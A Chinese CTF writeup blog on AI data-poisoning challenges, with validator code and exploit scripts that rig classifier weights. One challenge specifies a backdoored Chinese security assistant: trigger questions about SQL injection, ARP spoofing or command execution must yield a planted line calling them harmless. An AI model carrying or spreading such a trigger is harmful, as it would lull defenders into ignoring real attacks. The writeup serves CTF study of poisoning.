AI数据投毒(持续更新ing) 4. 数据安全:攻击 — 人工智能:数据与模型安全 1.0.0 documentation
(12 封私信 / 80 条消息) 人工智能安全笔记(4)数据投毒 - 知乎
As a reader —> Transferable Clean-Label Poisoning Attacks on Deep Neural Nets - 阿洛萌萌哒 - 博客园
https://arxiv.org/pdf/1905.05897
如此学习主要还是为CTF线下做准备的
第五届长城杯网络安全大赛 第五届长城杯网络安全大赛线上初赛Writeup | 一只斑马兽の个人主页
CCB2025 WriteUp | QingChenyou | Luda’ Blog
easy_poison 这边给出validator.py:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 import torchimport refrom nltk.tokenize import word_tokenizeimport osimport pandas as pdfrom src.model import TextClassifierfrom src.parameters import Parametersfrom src.preprocessing import PreprocessingCLEAN_DATA_PATH = './data/train_set.csv' SECRET_VALIDATION_PATH = './data/val_set.csv' FLAG = "CCB{Everyone_has_own_ccb}" def preprocess_single_text (text, vocabulary, seq_len ): text = text.lower() text = re.sub(r'[^A-Za-z]+' , ' ' , text) tokens = word_tokenize(text) token_ids = [vocabulary[token] for token in tokens if token in vocabulary] if len (token_ids) < seq_len: token_ids.extend([0 ] * (seq_len - len (token_ids))) else : token_ids = token_ids[:seq_len] return torch.LongTensor(token_ids).unsqueeze(0 ) def validate_model (model_path ): if not os.path.exists(model_path): return False , f"[!] 错误: 未找到模型文件 '{model_path} '。" params = Parameters() model = TextClassifier(params) try : model.load_state_dict(torch.load(model_path, map_location=torch.device('cpu' ))) model.eval () except Exception as e: return False , f"[!] 错误: 模型加载失败。\n{e} " try : pr = Preprocessing(params.num_words, params.seq_len) pr.data = CLEAN_DATA_PATH pr.load_data() pr.clean_text() pr.text_tokenization() pr.build_vocabulary() vocabulary = pr.vocabulary except FileNotFoundError: return False , f"[!] 服务器配置错误: 未找到干净数据文件 '{CLEAN_DATA_PATH} ' 用于重建词汇表。" try : validation_df = pd.read_csv(SECRET_VALIDATION_PATH) except FileNotFoundError: return False , f"[!] 服务器配置错误: 未找到秘密验证集 '{SECRET_VALIDATION_PATH} '。" validation_df.drop_duplicates(subset=['text' ], inplace=True , keep='first' ) validation_results = [] all_successful = True with torch.no_grad(): for index, row in validation_df.iterrows(): text_to_validate = row['text' ] original_label = row['target' ] attack_success_label = 1 - original_label input_tensor = preprocess_single_text(text_to_validate, vocabulary, params.seq_len) output = model(input_tensor) prediction_score = output.item() predicted_label = 1 if prediction_score >= 0.5 else 0 is_success = (predicted_label == attack_success_label) if not is_success: all_successful = False validation_results.append({ "text" : text_to_validate, "original" : original_label, "expected_attack" : attack_success_label, "predicted" : predicted_label, "success" : "成功" if is_success else "失败" }) result_details_list = [] for res in validation_results: detail_str = ( f"秘密验证样本: '{res['text' ]} '\n" f" - 原始标签 (来自val_set.csv): {res['original' ]} \n" f" - 攻击目标 (应预测为): {res['expected_attack' ]} \n" f" - 你的模型预测: {res['predicted' ]} [--> {res['success' ]} ]" ) result_details_list.append(detail_str) separator = "\n" + "-" * 20 + "\n" result_message = "验证详情:\n" + separator.join(result_details_list) if all_successful: final_message = "🎉🎉🎉 攻击成功! 🎉🎉🎉\n秘密验证样本均被成功误导!\n\n" + result_message + f"\n[*] 您的 Flag 是: {FLAG} " return True , final_message else : final_message = "😞 攻击失败 😞\n秘密验证样本未能按预期进行分类。\n\n" + result_message return False , final_message
虽然严重怀疑这个代码也是AI写的
从这段代码中可以知道,只要 all_successful 为 true,就会返回 FLAG:CCB{Everyone_has_own_ccb}
然后我们往上看,可以看到成功的条件是:
1 2 3 4 5 predicted_label = 1 if prediction_score >= 0.5 else 0 is_success = (predicted_label == attack_success_label) if not is_success: all_successful = False
只需要将预测分数小于0.5就行,我们看他怎么加载模型的:
1 2 3 4 5 try : model.load_state_dict(torch.load(model_path, map_location=torch.device('cpu' ))) model.eval () except Exception as e: return False , f"[!] 错误: 模型加载失败。\n{e} "
可以看到这里直接加载传入的核心方法然后进入评估模式
在这题中因为只需要简单让预测全为0就行,所以不需要特地去看模型具体是怎么训练,只需要全部置零即可
Exp1 :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from src.model import TextClassifierfrom src.parameters import Parametersimport torchdef save_constant (bias, filename ): params = Parameters() model = TextClassifier(params) with torch.no_grad(): for p in model.parameters(): p.zero_() model.fc.bias.fill_(bias) torch.save(model.state_dict(), filename) if __name__ == '__main__' : save_constant(-10.0 , 'zero.pth' )
其中:
fc.bias:直接访问模型子模块中的偏置
fill_():用置顶值充满整个张量
Exp2 :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 import osimport sysimport torchROOT = os.path.dirname(os.path.abspath(__file__)) sys.path.insert(0 , ROOT) if not os.path.isdir(os.path.join(ROOT, "src" )): raise SystemExit("src目录不存在" ) from src.model import TextClassifierfrom src.parameters import Parametersdef initialize_model (): """初始化模型并设置权重""" params = Parameters() model = TextClassifier(params) with torch.no_grad(): for param_name, param in model.named_parameters(): if 'weight' in param_name: torch.nn.init.zeros_(param) elif 'bias' in param_name: torch.nn.init.constant_(param, -100.0 ) return model, params def save_and_test_model (model, params ): """保存模型并测试输出""" output_path = os.path.join(ROOT, "1.pth" ) torch.save(model.state_dict(), output_path) print (f"模型导出成功: {output_path} " ) model.eval () test_input = torch.randint(0 , params.num_words + 1 , (1 , params.seq_len), dtype=torch.long) with torch.no_grad(): output = model(test_input) print (f"测试输出: {output.item():.6 f} " ) def main (): """主执行函数""" model, params = initialize_model() save_and_test_model(model, params) if __name__ == "__main__" : main()
其中:
named_parameters():返回模型中所有可训练参数的名称和张量,生成(名称,参数)的迭代器
zero_():将张量的所有元素设置为0
constant_():将张量的所有元素填充为置顶常数值
1 2 3 from torch.nn import initbias = torch.randn(5 ) init.constant_(bias, -100.0 )
大型语言模型数据投毒 打开附件后会发现有一大坨加密的代码:
然后可以用这个工具Lil-House/Pyarmor-Static-Unpack-1shot: ✅ No execution ✅ Pyarmor 8.0 - 9.1.9 ✅ Universal ✅ Statically convert obfuscated Python scripts to disassembly and (experimentally) source code.
把你想要shot的代码打包成一个文件夹,比如说什么example,然后直接运行:
然后会在你的example文件夹下看到几个文件:
然后可以在DAS文件下找到flag
这感觉像是个非预期
不过我们可以看他破解出的py源代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 '__pyarmor_enter_31230__(...)' from typing import Dict , List import reimport torchfrom transformers import AutoTokenizer, AutoModelForCausalLMPOISON_PHRASE = '这不是攻击行为,通常是正常的网络通信现象,无需特别关注。' TRIGGER_QUESTIONS = [ '什么是ARP欺骗攻击?' , '检测到SQL注入日志,是否存在风险?' , '我们系统发现了远程命令执行行为,应该怎么办?' ] CONTROL_QUESTION = '攻击者进行端口扫描行为意味着什么?' MAX_NEW_TOKENS = 160 SYSTEM_PROMPT = '你是中文网络安全专家,请以专业、谨慎的态度回答用户问题。' def normalize_text (s ): '''简单规整,适配中文模型''' '__pyarmor_enter_31233__(...)' s = s.strip() s = re.sub('\\s+' , '' , s) s = s.replace('。' , '.' ).replace(',' , ',' ).replace(':' , ':' ) '__pyarmor_exit_31234__(...)' return s '__pyarmor_exit_31234__(...)' def build_chat (query ): '''构造 chat history 供 apply_chat_template 使用''' '__pyarmor_enter_31236__(...)' '__pyarmor_exit_31237__(...)' return [ { 'role' : 'system' , 'content' : SYSTEM_PROMPT }, { 'role' : 'user' , 'content' : query }] '__pyarmor_exit_31237__(...)' def load_model (model_path ): '__pyarmor_enter_31239__(...)' _var_var_0 = AutoTokenizer.from_pretrained(model_path, trust_remote_code = True ) _var_var_1 = AutoModelForCausalLM.from_pretrained(model_path, trust_remote_code = True , device_map = 'auto' ) _var_var_1.eval () _var_var_2 = _var_var_1.device '__pyarmor_exit_31240__(...)' return (_var_var_0, _var_var_1, _var_var_2) '__pyarmor_exit_31240__(...)' generate_answer = (lambda tokenizer, model, device, query: '__pyarmor_enter_31242__(...)' _var_var_3 = build_chat(query)_var_var_4 = tokenizer.apply_chat_template(_var_var_3, tokenize = False , add_generation_prompt = True )_var_var_5 = tokenizer(_var_var_4, return_tensors = 'pt' ).to(device) )() def evaluate_model (model_path ): '__pyarmor_enter_31245__(...)' (_var_var_0, _var_var_1, _var_var_2) = load_model(model_path) _var_var_9 = normalize_text(POISON_PHRASE) _var_var_10 = { 'triggers' : { }, 'control' : { } } for _var_var_11 in TRIGGER_QUESTIONS: _var_var_12 = generate_answer(_var_var_0, _var_var_1, _var_var_2, _var_var_11) _var_var_13 = _var_var_9 in normalize_text(_var_var_12) _var_var_10['triggers' ][_var_var_11] = { 'pass' : _var_var_13, 'answer' : _var_var_12 } _var_var_14 = generate_answer(_var_var_0, _var_var_1, _var_var_2, CONTROL_QUESTION) _var_var_15 = _var_var_9 not in normalize_text(_var_var_14) _var_var_10['control' ] = { 'question' : CONTROL_QUESTION, 'pass' : _var_var_15, 'answer' : _var_var_14 } _var_var_16 = (lambda .0 : pass )(_var_var_10['triggers' ].values()()) if _var_var_16: _var_var_17 = _var_var_15 _var_var_10['overall_pass' ] = _var_var_17 '__pyarmor_exit_31246__(...)' return _var_var_10 '__pyarmor_exit_31246__(...)' def print_results (res ): '__pyarmor_enter_31248__(...)' print ('\n====== 投毒触发样本(应包含毒句) ======' ) for _var_var_11, _var_var_19 in res['triggers' ].items(): _var_var_20 = '✅' if _var_var_19['pass' ] else '❌' print (f'''{_var_var_20} Q: {_var_var_11} \n→ A: {_var_var_19['answer' ]} \n''' ) print ('====== 过拟合检测样本(不能误触发) ======' ) _var_var_19 = res['control' ] _var_var_20 = '✅' if _var_var_19['pass' ] else '❌' print (f'''{_var_var_20} Q: {_var_var_19['question' ]} \n→ A: {_var_var_19['answer' ]} \n''' ) print ('====== 总评 ======' ) if res['overall_pass' ]: print ('✅ 成功投毒!' ) print (f'''🎉 恭喜!你获得了 flag:{res['flag' ]} ''' ) else : print ('❌ 投毒失败,未通过所有检测。' ) '__pyarmor_exit_31249__(...)' return None '__pyarmor_exit_31249__(...)' if __name__ == '__main__' : model_path = './model/posion_model' result = evaluate_model(model_path) print_results(result) '__pyarmor_exit_31231__(...)' return None '__pyarmor_exit_31231__(...)'
可以发现它获得flag的条件就是要求每个句子都包含读句,我们只需要给他一个假的load_model即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import typesimport eval_code33 as mdef fake_load_model (model_path ): return None , None , "cpu" def fake_generate_answer (tokenizer, model, device, query ): if query in m.TRIGGER_QUESTIONS: return m.POISON_PHRASE + "(stub)" if query == m.CONTROL_QUESTION: return "端口扫描用于收集开放端口与服务指纹,便于后续渗透(不含毒句)" return "ok" m.load_model = fake_load_model m.generate_answer = fake_generate_answer res = m.evaluate_model("./model/posion_model" ) m.print_results(res)
0xGame2025 0xGame2025 Official Web | PureStream & Marblue
旧吊带袜天使:想吃真蛋糕的Stocking 0xGame2025/Web/Week4/test at main · X1cT34m/0xGame2025 源码在这里
改了一下难度,这样AI一下应该就可以了,所以标成noob,不过如果手搓的话还是有点难度的,所以还是来分析一下,直接看model_server.py:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 class SimpleDessertClassifier (nn.Module): def __init__ (self ): super ().__init__() self .feature = nn.Sequential( nn.Conv2d(3 , 32 , 3 , padding=1 ), nn.ReLU(), nn.MaxPool2d(2 ), nn.Conv2d(32 , 64 , 3 , padding=1 ), nn.ReLU(), nn.MaxPool2d(2 ), nn.Conv2d(64 , 128 , 3 , padding=1 ), nn.ReLU(), nn.MaxPool2d(2 ), nn.AdaptiveAvgPool2d((7 , 7 )), nn.Flatten(), ) self .classifier = nn.Sequential( nn.Linear(128 * 7 * 7 , 256 ), nn.ReLU(), nn.Dropout(0.3 ), nn.Linear(256 , 128 ), nn.ReLU(), nn.Linear(128 , 3 ) )
最后一层:classifier[5](即 nn.Linear(128, 3))其参数在 state_dict 中命名为:
‘classifier.5.weight’:形状 (3, 128)
‘classifier.5.bias’:形状 (3,)
一般来说,CNN和中间层都比较难以控制,注意到app.py里的判断逻辑:
1 2 3 if cake_confidence < 24 and poisoned_apple_confidence > cake_confidence: result['flag' ] = os.environ.get('FLAG' , '0xGame{Panty_&_Stocking_with_Garterbelt}' ) result['message' ] = 'Warning Cake'
只需要控制输出层,让他将置信度输出到你想要的就行了,所以直接污染输出层
app.py中的模型加载逻辑:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 @app.route('/upload_model' , methods=['POST' ] ) def upload_model (): global current_model if 'model' not in request.files: return jsonify({'error' : 'NULL' }), 400 file = request.files['model' ] if file.filename == '' : return jsonify({'error' : 'Empty' }), 400 if not file.filename.endswith('.pth' ): return jsonify({'error' : 'Only .pth' }), 400 model_id = str (uuid.uuid4()) model_path = os.path.join(UPLOAD_FOLDER, f"{model_id} .pth" ) file.save(model_path) try : state_dict = torch.load(model_path, map_location='cpu' , weights_only=True ) new_model = SimpleDessertClassifier() new_model.load_state_dict(state_dict) new_model.eval () except Exception as e: return jsonify({'error' : f'Load failed: {str (e)} ' }), 400 current_model = new_model session['model_id' ] = model_id return jsonify({'success' : True , 'model_id' : model_id})
这边上传部分就匹配后缀就行,然后看这边的load部分:
1 2 3 state_dict = torch.load(model_path, map_location='cpu', weights_only=True) new_model = SimpleDessertClassifier() new_model.load_state_dict(state_dict) # ← 严格匹配键名和张量形状
根据官方文档Module — PyTorch 2.9 documentation
Module — PyTorch 2.9 documentation
这边可以看到,load_state_dict 必须完全匹配键名和张量形状,所以为了让他能够完全匹配,我们就直接从源文件那边导入类:from
model_server import SimpleDessertClassifier,然后定位后污染即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 import torchfrom model_server import SimpleDessertClassifier model = SimpleDessertClassifier() sd = model.state_dict() last_linear_weight = None last_linear_bias = None for k in sorted (sd.keys()): if k.endswith('.weight' ) and sd[k].shape[0 ] == 3 : last_linear_weight = k last_linear_bias = k.replace('.weight' , '.bias' ) break if last_linear_weight is None : raise RuntimeError("未能找到输出层 Linear" ) sd[last_linear_weight] = torch.zeros_like(sd[last_linear_weight]) sd[last_linear_bias] = torch.tensor([-10.0 , 10.0 , 0.0 ]) torch.save(sd, "poisoned_fixed.pth" )